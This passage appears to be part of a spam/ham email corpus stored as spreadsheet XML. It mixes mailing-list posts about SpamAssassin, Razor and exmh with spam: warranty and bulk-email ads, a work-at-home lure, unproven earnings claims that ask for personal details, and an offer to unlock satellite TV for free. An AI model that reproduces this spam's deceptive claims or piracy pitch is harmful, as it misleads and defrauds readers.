 Y2VscjguY29tL3ZpZGVvL2hjX3ZpZGVvLmh0bT4NCjxpbWcgc3JjPWh0dHA6Ly93d3cuYW5nZWxm
 aXJlLmNvbS84MHMvcGljOS94dWVhbi5naWYgYWx0PWh0dHA6Ly93d3cuYW5nZWxmaXJlLmNvbS84
 MHMvcGljOS94dWVhbi5naWY+DQo8L2E+DQoNCjxhIGhyZWY9aHR0cDovL3JvY2lvNjMuaG9wdG8u
 b3JnL2ZsYXNoPg0KPGltZyBzcmM9aHR0cDovL3d3dy5hbmdlbGZpcmUuY29tLzgwcy9waWM5L2Fs
 bGFjY2VwdC5naWYgYWx0PWh0dHA6Ly93d3cuYW5nZWxmaXJlLmNvbS84MHMvcGljOS9hbGxhY2Nl
 cHQuZ2lmPg0KPC9hPg0KDQo8YSBocmVmPWh0dHA6Ly9leGFtLmhvcHRvLm9yZy9zZWU+DQo8aW1n
 IHNyYz1odHRwOi8vd3d3LmFuZ2VsZmlyZS5jb20vODBzL3BpYzkvc2hvdWppZS5qcGcgYWx0PWh0
 dHA6Ly93d3cuYW5nZWxmaXJlLmNvbS84MHMvcGljOS9zaG91amllLmpwZz4NCjwvYT4NCg0KPGEg
 aHJlZj1odHRwczovL3RpYW5kaS5zeXRlcy5uZXQ+DQo8aW1nIHNyYz1odHRwOi8vd3d3LmFuZ2Vs
 ZmlyZS5jb20vODBzL3BpYzkvdGFpd2FuLmdpZiBhbHQ9aHR0cDovL3d3dy5hbmdlbGZpcmUuY29t
 Lzgwcy9waWM5L3RhaXdhbi5naWY+DQo8L2E+
 ------=_NextPart_EvPezLBcciXYyAA--
 ------=_NextPart_EvPezLBcciXYy--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranty -- even older cars... pobiv
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect yourself with an extended warranty for your car, minivan, truck or SUV. Buy DIRECT and SAVE money 40% to 60%!
 http://211.78.96.11/extended/warranty.htm
 Extend your existing Warranty.
 Get a new Warranty even if your original Warranty expired.
 Get a FREE NO OBLIGATION Extended Warranty Quote NOW. Find out how much it would cost to Protect YOUR investment. 
 This is a FREE Service.
 Simply fill out our FREE NO OBLIGATION form and find out.
 It's That Easy!
 Visit our website:  
 http://211.78.96.11/extended/warranty.htm
 ================================================
 To be removed, click below and fill out the remove form:
 http://211.78.96.11/removal/remove.htm
 Please allow 72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-08-27
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 This Week on perl5-porters (19-25 August 2002)
     posted by rafael on Monday August 26, @07:42 (summaries)
     http://use.perl.org/article.pl?sid=02/08/26/1154225
 Slashdot Taking Questions to Ask Larry Wall
     posted by pudge on Monday August 26, @14:41 (perl6)
     http://use.perl.org/article.pl?sid=02/08/26/1845224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</si>
  <si>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[zzzzteana] The new Steve Earle
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; CAM'RON associate JUELZ SANTANA has vehemently defended a lyric on the
 &gt; forthcoming album by the pair's DIPLOMATS crew that pays tribute to
 &gt; September 11 hijacker OMAR ATTA
 No, Steve Earle at least USED to make great records.
 Martin
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Sep 09, 2002 at 05:10:23PM -0400, Rob wrote:
 &gt; I just set up razor and spamassassin, but I keep getting this error in my 
 &gt; mail log file
 &gt; 
 &gt; razor2 check skipped: No such file or directory Can't call method "log" on 
 &gt; unblessed reference at 
 &gt; /usr/local/lib/perl5/site_perl/5.8.0/Razor2/Client/Agent.pm line 212.
 &gt; 
 &gt; I have looked through the archived list and the only thing I have seen 
 &gt; about this error is a possible permission problem on the log file.
 Yeah, the answer isn't here in this list, it's on the spamassassin-users
 list.  I just asked it late last week.
 Hint:  Add -H to the spamd startup flags using the latest version of
 spamassassin.
 -Dave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</si>
  <si>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On Mon, 12 Aug 2002, Vipul Ved Prakash wrote:
 &gt; On Mon, Aug 12, 2002 at 10:38:44AM -0700, Craig R . Hughes wrote:
 &gt; &gt; This is, I think the biggest fallacy here.  You don't have to
 &gt; &gt; block jack shit to get a high trust rating, you just have to
 &gt; &gt; confirm Razor's existing opinion on a large number of messages:
 &gt; &gt;
 &gt; &gt; if(check() == spam) then submit() else revoke()
 &gt; &gt;
 &gt; &gt; That algorithm boosts trust, but reduces the information in
 &gt; &gt; SpamNet by damping.
 &gt;
 &gt; Again, this is not true. Only certain events (reports/revokes) for a spam
 &gt; are rewarded and the algorithm for picking these up is based on many
 &gt; different factors.
 And those would be????
 Is there a point that you plan on releasing detailed information about
 TeS, so we can stop engaging in idle speculation?
 It's not my desire to second-guess you Vipul(however much my missives may
 appear otherwise) or question the hard work you and the other
 developers have put into the system, however it seems that every request
 for such information has been met with silence.
 Thanks.
 /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                                Patrick Greenwell
          Asking the wrong questions is the leading cause of wrong answers
 \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/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</si>
  <si>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Xander Blakley quotes a Russian joke in his terrific book _Siberia Bound_. 
 Frenchman, American, and Russian get to talking bout which country has the 
 more desireable women. Frenchman says, "Ah, when a Frenchman puts his hands 
 around zee waist of his lover, his fingers form a complete circle and 
 touch--not because his hands are so large, but because zee  French woman's 
 waist is so slender."
     American says "Yep, but when an American woman gets on a horse, her heels 
 reach all the way down to the ground--and it's not because American horses 
 are short, but because American women have such endlessly long, sexy legs."
     Russian says: "Da, but when a Russian slaps his wife's ass on his way out 
 of the house in the morning, it's still jiggling when he comes back after 
 work--and it's not because her ass is so big, but because the Russian work 
 day is so short."
 Tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You have been hand selected... Free Info!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="MSHTML 6.00.2716.2200" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;CENTER&gt;
 &lt;TABLE borderColor=black cellSpacing=0 cellPadding=10 border=1&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;FONT size=2&gt;&lt;A
       href="http://theadmanager.com/server/c.asp?ad_key=BBBIJJJNSUMV&amp;ext=1"
       target=""&gt;&lt;IMG height=71 alt=""
       src="http://www.findanopportunity.com/fgoffer/htmlemail2/top_01.gif"
       width=549 border=0&gt;&lt;BR&gt;&lt;IMG height=73 alt=""
       src="http://www.findanopportunity.com/fgoffer/htmlemail2/top_02.gif"
       width=549 border=0&gt;&lt;BR&gt;&lt;IMG height=115 alt=""
       src="http://www.findanopportunity.com/fgoffer/htmlemail2/collage_01.jpg"
       width=188 border=0&gt;&lt;IMG height=115 alt=""
       src="http://www.findanopportunity.com/fgoffer/htmlemail2/collage_02.jpg"
       width=171 border=0&gt;&lt;IMG height=115 alt=""
       src="http://www.findanopportunity.com/fgoffer/htmlemail2/collage_03.jpg"
       width=190 border=0&gt;&lt;/A&gt; &lt;FONT face=verdana color=#cc6666 size=+1&gt;
       &lt;CENTER&gt;&lt;STRONG&gt;&lt;EM&gt;You've been hand selected &lt;BR&gt;to access this exclusive
       &lt;BR&gt;work-at-home information &lt;BR&gt;&lt;/FONT&gt;&lt;FONT face=verdana color=#cc6666
       size=6&gt;for &lt;A
       href="http://theadmanager.com/server/c.asp?ad_key=BBBIJJJNSUMV&amp;ext=1"
       target=""&gt;FREE!&lt;/A&gt;&lt;/FONT&gt;&lt;/EM&gt;&lt;/STRONG&gt;
 &lt;/CENTER&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellPadding=7&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;CENTER&gt;&lt;A
       href="http://theadmanager.com/server/c.asp?ad_key=BBBIJJJNSUMV&amp;ext=1"
       target=""&gt;&lt;IMG
       src="http://www.findanopportunity.com/fgoffer/htmlemail2/button.jpg"&gt;
       &lt;/CENTER&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=BBBIJJJNSUMV"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</si>
  <si>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do you need a lot of new customers? 5326171310876554443333
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;b&gt;
 &lt;font face="Arial" color="#0000FF"&gt;PROMOTE YOUR PRODUCT OR
 SERVICE TO MILLIONS TODAY!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial" color="#0000FF"&gt;E-MAIL MARKETING&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial"&gt;- Bulk e-mail will make you money so fast, your head will
 spin!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;- Our customers tell us that they would no longer be in
 business without it.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;b&gt;
 &lt;font face="Arial"&gt;- New collection of software allows you to collect targeted
 e-mail addresses for free!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;font face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;font size="2"&gt;See this product's web
 page&lt;/font&gt;
 &lt;b&gt;&lt;a href="http://81.9.8.7/E-Mail%20Marketing.htm"&gt;CLICK
 HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial" color="#0000FF"&gt;1 MILLION AMERICAN BUSINESS LEADS ON
 CD&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;- If you do telemarketing, mailing, or faxing this list
 will be a gold mine!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial"&gt;- Contains company name, address,
 phone, fax, SIC, # of employees &amp;amp; revenue&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;b&gt;&lt;font face="Arial"&gt;-
 List allows for
 UNLIMITED DOWNLOADS!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;font
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;font size="2"&gt;See this product's web page&lt;/font&gt; &lt;b&gt;
 &lt;a href="http://81.9.8.7/Business%20CD.htm"&gt;CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial" color="#0000FF"&gt;FAX MARKETING SYSTEM&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;
 &lt;font face="Arial"&gt;- Fax broadcasting is the hot new way to market your product
 or service!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;- People are 4 times more likely to read faxes than direct
 mail.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;- Software turns your computer into a fax blaster with 4
 million  leads on disk!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;font
 face="Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;font size="2"&gt;See this product's web page&lt;/font&gt; &lt;b&gt;
 &lt;a href="http://81.9.8.7/Fax%20Marketing.htm"&gt;CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&lt;font
 face="Arial"&gt;&lt;b&gt;Visit our web site or
 call 618-288-6661 for more information.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p style="margin-top: 0; margin-bottom: 0" align="left"&gt;
 &lt;font face="Arial" size="2"&gt;to be taken off of our list
 &lt;a href="mailto:l1l12345a1@btamail.net.cn"&gt;click here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Oooops!
 Doesn't work at all. Got this on startup and on any attempt to change folder (which fail)
 /Anders
 can't read "flist(seqcount,lists/exmh,unseen)": no such element in array
     (reading value of variable to increment)
     invoked from within
 "incr flist(seqcount,$folder,$seq) $delta"
     (procedure "Seq_Del" line 16)
     invoked from within
 "Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $msgid"
     (procedure "MsgSeen" line 7)
     invoked from within
 "MsgSeen $msgid"
     (procedure "MsgShow" line 12)
     invoked from within
 "MsgShow $msgid"
     (procedure "MsgChange" line 17)
     invoked from within
 "MsgChange 73 show"
     invoked from within
 "time [list MsgChange $msgid $show"
     (procedure "Msg_Change" line 3)
     invoked from within
 "Msg_Change $msg(id) $show"
     (procedure "Msg_Show" line 7)
     invoked from within
 "Msg_Show cur"
     ("eval" body line 1)
     invoked from within
 "eval $msgShowProc"
     (procedure "FolderChange" line 55)
     invoked from within
 "FolderChange lists/exmh {Msg_Show cur}"
     invoked from within
 "time [list  FolderChange $folder $msgShowProc"
     (procedure "Folder_Change" line 3)
     invoked from within
 "Folder_Change $exmh(folder)"
     (procedure "Exmh" line 101)
     invoked from within
 "Exmh"
     ("after" script)
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri 19 Jul 2002 12:41, Wynne, Conor wrote:
 &gt; As long as it looks like the cat type Pokemon called "Persian" [It just
 &gt; looks like a siamese]
 You're going to get Significant Frowns from your average cat breeder
 if you say you want a cat who looks like a Pokmon.
 Why is that Pokmon called "Persian", anyway - it looks nothing like a
 Persian cat?  It does look like a Siamese or (more likely)
 Abyssinian.  If you want one of these breeds, I hope you're prepared
 to part with BIGNUM; they're not cheap.
 There aren't a lot of "quality" cat breeders in Ireland, and they tend
 not to have many kittens for sale, so I don't know how feasible it is
 to get a Siamese or Abyssinian in a hurry.  "Not very", is my best
 guess.
 &gt; I see the Burmese are nice but I like the pointy ears of the
 &gt; Siamese.
 Siamese *in general* aren't the friendliest of cats; they tend to be
 slightly overbred and you end up with hissing maniacs as a result.
 Abys tend to be nicer, and Burmese nicer still.  You can be lucky with
 individual cats, though.
          Colm
 -- 
 Colm Buckley | colm@tuatha.org | +353 87 2469146 | www.colm.buckley.name
 Santaclaustrophobia: Fear of crowded holiday shopping.
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Is ANY of this stuff TRUE?!?!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;head&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/head&gt;
 &lt;CENTER&gt;
 &lt;TABLE style="WIDTH: 586px; HEIGHT: 897px" height=897 cellSpacing=0 cellPadding=3 width=586 background=http://users.myexcel.com/chrislavy/money.jpg border=2&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD vAlign=top width="100%" height=534&gt;&amp;nbsp; 
 &lt;DIV align=center&gt;
 &lt;TABLE height="95%" cellSpacing=0 cellPadding=0 width="95%" bgColor=#11111 border=2&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD vAlign=top width="100%" height="87%"&gt;
 &lt;P style="MARGIN-TOP: 1px" align=center&gt;&lt;font face="Comic Sans MS" color="#fffbf4" size="4"&gt;&lt;strong&gt;&lt;font style="background-color: #009966"&gt;Does
 Anyone REALLY Make Any Money Online?&lt;br&gt;Or is it all ONE BIG SCAM?!&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/P&gt;
 &lt;P style="MARGIN-TOP: 1px" align="center"&gt;&lt;FONT face=Arial color=#3a6ea5 size=2&gt;&lt;FONT style="BACKGROUND-COLOR: #0000ff" face="Verdana, Helvetica, &amp;#13;&amp;#10;&amp;#13;&amp;#10;sans-serif" size=1&gt;&lt;FONT style="BACKGROUND-COLOR: #009966"&gt;&amp;nbsp;&amp;nbsp;&lt;img border="0" src="http://users.myexcel.com/chrislavy/ani-money.gif" width="135" height="78"&gt;&amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/FONT&gt;
 &lt;P style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=center&gt;&lt;b&gt;&lt;font face="Arial" color="#FF0000"&gt;FACT:
 We earned $26,087.58 in 94 days - and we can PROVE it!&lt;/font&gt;&lt;/b&gt;
 &lt;P style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=center&gt;&amp;nbsp;&lt;font face="Comic Sans MS" color="#00ff99"&gt;Another
 FACT&lt;/font&gt;&lt;font face="Comic Sans MS" color="#00ff99"&gt;:
 &amp;quot;Everyone Can Do It&amp;quot; is a LIE!!!&lt;/font&gt;
 &lt;P align="center"&gt;&lt;font face="Comic Sans MS" color="#FF0000"&gt;&lt;b&gt;HINT:
 &amp;quot;DUPLICATION&amp;quot; Does NOT Work!&lt;/b&gt;&lt;/font&gt;&lt;font face="Comic Sans MS" color="#FF0000"&gt;&lt;b&gt;&lt;br&gt;&amp;quot;DELEGATION&amp;quot;
 Does!&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial" color="#00ff99"&gt;&lt;BR&gt;&lt;BR&gt;&lt;/font&gt;&lt;font face="Comic Sans MS" color="#00ff99"&gt;No
 B.S. here - &lt;br&gt;SEE OUR ACTUAL CHECKS! &lt;br&gt;See EXACTLY how we made that money - &lt;br&gt;and how
 we have helped OTHERS make money also!&lt;/font&gt;&lt;/P&gt;
 &lt;P align="center"&gt;&lt;FONT face="Comic Sans MS"&gt;&lt;font face="Arial" color="#00ff99"&gt;&amp;nbsp;
 &lt;/font&gt;&lt;font face="Arial" color="#FF0000"&gt;&lt;b&gt;Julie P. earned $750 in one week with us&lt;BR&gt;&amp;nbsp; Jeff A. earned $6500 in 5 weeks with us&lt;BR&gt;&amp;nbsp;
 Kate B. earned $740 in 11 days with us&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial" color="#00ff99"&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/FONT&gt;&lt;font face="Comic Sans MS" color="#00ff99"&gt;Let us MAIL YOU this
 FREE CD -&lt;br&gt;
 see our checks AND how we did it!&lt;/font&gt;&lt;/P&gt;
 &lt;p align="center"&gt;&lt;font face="Comic Sans MS" color="#00ff99"&gt;Send your&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font face="Comic Sans MS" color="#FF0000"&gt;Name&lt;br&gt;
 Street Address&lt;br&gt;
 City, State/Province Zip&lt;br&gt;
 Country&lt;br&gt;
 Phone&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font face="Comic Sans MS" color="#00FF99"&gt;to &lt;a href="mailto:defglass@excite.com?subject=FREE_CD"&gt;defglass@excite.com?subject=FREE_CD&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;P align="center"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;FONT face=Arial color=#00ff99&gt;&lt;FONT color=#ff0000&gt;&lt;IMG alt="" hspace=0 src="http://users.myexcel.com/chrislavy/Alarm-10.gif" border=0 width="84" height="89"&gt;&lt;b&gt;Time is running out, check this out TODAY!&lt;/b&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;/CENTER&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;p align="center"&gt;=================================================================&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;To be removed from our mailing list, please &lt;a href="mailto:defglass@excite.com?subject=REMOVE"&gt;mailto:defglass@excite.com?subject=REMOVE&lt;/a&gt;
 and your request will be honored immediately. Thanks.&lt;/b&gt;&lt;br&gt;
 ============================&lt;/p&gt;
 &lt;P&gt;&lt;BR&gt;
 &lt;HR SIZE=1&gt;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</si>
  <si>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All Satellite Channels Free !!                     712
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 Free sports, Free xxx Movies, Free Pay perview.
 &lt;/b&gt;&lt;/font&gt;&lt;/center&gt;&lt;BR&gt;
 &lt;center&gt;
 &lt;font size=3D"5"&gt;&lt;font color=3D"red"&gt;&lt;b&gt;Get All Satellite Channels Free !!
 &lt;/b&gt;&lt;/font&gt;&lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;blockquote&gt;
 &lt;ul&gt;
 &lt;font size=3D"4"&gt;&lt;font color=3D"blue"&gt;
 Now your can program your satellite system to get all&lt;BR&gt;
 channels free. This include Direct Tv, Dishnetwork &lt;BR&gt;
 and Gla. Our satellite programming packages comes with&lt;BR&gt;
 everything your need to program your satellite system.&lt;BR&gt;
 The software is ease as 1,2,3 to use and it takes less&lt;BR&gt;
 that 5 minute to program your satellite system. There &lt;BR&gt;
 are company that will charge you up to $600 to do this&lt;BR&gt;
 for you and everytime your card needs to be reset they &lt;BR&gt;
 charge you an extra $100.00 Now you can do it yourself for :&lt;BR&gt;&lt;BR&gt;
 &lt;font size=3D"5"&gt;&lt;font color=3D"brown"&gt;&lt;b&gt;Only $99.00
 &lt;/b&gt;&lt;/font&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;font size=3D"5"&gt;&lt;font color=3D"red"&gt;&lt;b&gt;
 &lt;a href=3D"mailto:satplus@zeropain.com"&gt;Email us &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
 for order information.
 &lt;/ul&gt;
 &lt;/blockquote&gt;
 &lt;/center&gt;
 &lt;html&gt;
 &lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;html&gt;&lt;p&gt;&lt;BR&gt;&lt;p&gt;&lt;center&gt;&lt;p&gt;&lt;font size=3D"4"&gt;&lt;font color=3D"blue"&gt;&lt;b&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">At 3:59 PM +0100 8/22/02, Justin Mason wrote:
 &gt;Justin Shore said:
 &gt;
 &gt;&gt;  I just ran across a false positive that scored 8.6.  The message was
 &gt;&gt;  a solicited ad from Apple.com on educator deals.  I can send a copy
 &gt;&gt;  if anyone wants it.
 &gt;
 &gt;Yes, please do send it on, and I'll add it to the non-spam corpus.
 To any particular address?  I checked the lists page but didn't see 
 an address to see a FP to.
 &gt;To date, the scores evolved by SpamAssassin are very biased towards
 &gt;non-HTML, non-newsletter-ish mail.  This release should be different, as
 &gt;I've been spending the last month signing up a "nonspamtrap" to every
 &gt;legit newsletter I can find ;)
 That's understandable.  HTML mail is the worst thing since female 
 shoe sales at the mall. ;-)  Signup for the cruisercustomizing.com 
 newsletter.  Great place to find and review motorcycle parts. :)
 &gt;This should mean that tests which match common-enough newsletter practices
 &gt;will no longer get such high scores once we re-run the GA.
 Sound pretty slick.  If I come across any more legit newsletters, 
 I'll send them your way.
 Thanks for the info
   Justin
 -- 
 --
 Justin Shore, ES-SS ES-SSR                Pittsburg State University
 Network &amp; Systems Manager                 http://www.pittstate.edu/ois/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</si>
  <si>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Your Daily Dilbert 07/20/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">--24851503.1027162641507.JavaMail.root.umsan1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 E-mail error
 You're subscribed to the HTML version of the Daily Dilbert,
 which shows the comic strip as a graphic, but your mail system
 either can't support HTML or is set up to remove HTML content. For
 more information, contact your Internet service provider or mail
 system administrator.
 To change to a plain text subscription, modify your account
 preferences at 
 http://www.dilbert.com/comics/dilbert/daily_dilbert/html/login.html
 The plain text option appears toward the bottom of the modification
 page.
 --24851503.1027162641507.JavaMail.root.umsan1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Daily Dilbert&lt;/TITLE&gt;
 &lt;meta http-equiv=3D"pragma" content=3D"no-cache"&gt;
 &lt;META HTTP-EQUIV=3D"expires" CONTENT=3D"0"&gt;
 &lt;meta http-equiv=3D"Cache-control" content=3D"no-cache"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#336699" text=3D"#000000" link=3D"#000000" vlink=3D"#00339=
 9" alink=3D"#3333CC" MARGINWIDTH=3D"0" MARGINHEIGHT=3D"8" LEFTMARGIN=3D"0" =
 TOPMARGIN=3D"8"&gt;
 &lt;TABLE WIDTH=3D"100%" BORDER=3D"0" CELLPADDING=3D"0" BGCOLOR=3D"#336699"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR=3D"#336699" WIDTH=3D"15"&gt;&lt;IMG SRC=3D"http://www.comics.com/comi=
 cs/dilbert/images/clear_dot.gif" WIDTH=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 &lt;TD BGCOLOR=3D"#336699"&gt;
 &lt;SCRIPT LANGUAGE=3D"JAVASCRIPT"&gt;
 &lt;!--=20
 function rand(n)=20
 {
 seed =3D (0x015a4e35 * seed) % 0xfffffff;
 return (seed &gt;&gt; 16) % n;
 }
 var now =3D new Date ();
 var seed =3D now.getTime() % 0xffffffff;
 var same =3D rand(1000);
 // End hiding script from old browsers --&gt;
 &lt;/SCRIPT&gt;
 &lt;SCRIPT Language=3D"JavaScript"&gt;
 &lt;!-- hide from old browsers
   var today =3D new Date()
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE BEGIN --&gt;
 &lt;TABLE CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D"0"&gt;
 =09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09&lt;TD BGCOLOR=3D"#336699"&gt;
 =09=09=09&lt;!-- AD TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
